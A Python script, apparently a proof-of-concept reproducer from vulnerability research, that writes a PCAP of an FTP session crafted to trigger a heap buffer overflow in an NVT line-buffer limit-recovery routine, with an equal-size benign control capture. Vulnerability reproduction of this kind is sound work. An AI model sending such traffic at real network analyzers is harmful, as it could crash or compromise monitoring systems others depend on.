#!/usr/bin/env python3
"""
Generate an FTP/NVT line-limit heap-buffer-overflow PCAP.

The attack fills NVT's maximum line buffer with a trailing CR, supplies one
discarded byte to trigger limit recovery, and then supplies LF. The equal-size
control replaces the CR with ``A``. This was generated with OpenAI Codex and
performs no network I/O.

Originally generated by GPT-5.6 (OpenAI) via Trail of Bits, modified by Claude
to use Scapy.
"""

from __future__ import annotations

import argparse
from collections.abc import Iterator
from pathlib import Path

from scapy.layers.inet import IP, TCP
from scapy.packet import Packet
from scapy.utils import PcapWriter

CLIENT_IP = "192.0.2.1"
SERVER_IP = "192.0.2.2"
CLIENT_PORT = 40_000
SERVER_PORT = 21
MAX_LINE_LENGTH = 16 * 1024 * 1024 - 100
TCP_SEGMENT_SIZE = 1400
ACK_INTERVAL = 32


def make_packet(
    *,
    server_to_client: bool,
    sequence: int,
    acknowledgment: int,
    flags: str,
    payload: bytes = b"",
) -> Packet:
    if server_to_client:
        src_ip, dst_ip = SERVER_IP, CLIENT_IP
        src_port, dst_port = SERVER_PORT, CLIENT_PORT
    else:
        src_ip, dst_ip = CLIENT_IP, SERVER_IP
        src_port, dst_port = CLIENT_PORT, SERVER_PORT

    return (
        IP(src=src_ip, dst=dst_ip, flags="DF", ttl=64)
        / TCP(
            sport=src_port,
            dport=dst_port,
            seq=sequence,
            ack=acknowledgment,
            flags=flags,
            window=65_535,
        )
        / payload
    )


def nvt_segments(control: bool) -> Iterator[bytes]:
    """Yield the maximum line followed by the recovery-trigger bytes."""
    remaining = MAX_LINE_LENGTH - 1
    while remaining:
        size = min(remaining, TCP_SEGMENT_SIZE)
        yield b"A" * size
        remaining -= size

    final_buffer_byte = b"A" if control else b"\r"
    yield final_buffer_byte + b"X\n"


def tcp_packets(control: bool) -> Iterator[Packet]:
    """Yield one established FTP flow containing the selected NVT sequence."""
    client_sequence = 1000
    server_sequence = 8000

    yield make_packet(
        server_to_client=False,
        sequence=client_sequence,
        acknowledgment=0,
        flags="S",
    )
    client_sequence += 1

    yield make_packet(
        server_to_client=True,
        sequence=server_sequence,
        acknowledgment=client_sequence,
        flags="SA",
    )
    server_sequence += 1

    yield make_packet(
        server_to_client=False,
        sequence=client_sequence,
        acknowledgment=server_sequence,
        flags="A",
    )

    for segment_index, payload in enumerate(nvt_segments(control), start=1):
        yield make_packet(
            server_to_client=False,
            sequence=client_sequence,
            acknowledgment=server_sequence,
            flags="PA",
            payload=payload,
        )
        client_sequence += len(payload)
        if segment_index % ACK_INTERVAL == 0:
            yield make_packet(
                server_to_client=True,
                sequence=server_sequence,
                acknowledgment=client_sequence,
                flags="A",
            )

    yield make_packet(
        server_to_client=False,
        sequence=client_sequence,
        acknowledgment=server_sequence,
        flags="FA",
    )


def write_pcap(path: Path, packets: Iterator[Packet]) -> None:
    """Write packets to a PCAP with deterministic timestamps."""
    with PcapWriter(str(path), append=False, sync=False) as writer:
        for index, pkt in enumerate(packets):
            seconds, micros = divmod(index * 100, 1_000_000)
            pkt.time = 1_700_000_000 + seconds + micros / 1_000_000
            writer.write(pkt)


def main() -> None:
    """Parse arguments and generate the attack or equal-size control capture."""
    default_output = Path(__file__).with_suffix("")
    parser = argparse.ArgumentParser()
    parser.add_argument("output", nargs="?", type=Path, default=default_output)
    parser.add_argument("--control", action="store_true")
    args = parser.parse_args()
    write_pcap(args.output, tcp_packets(args.control))


if __name__ == "__main__":
    main()
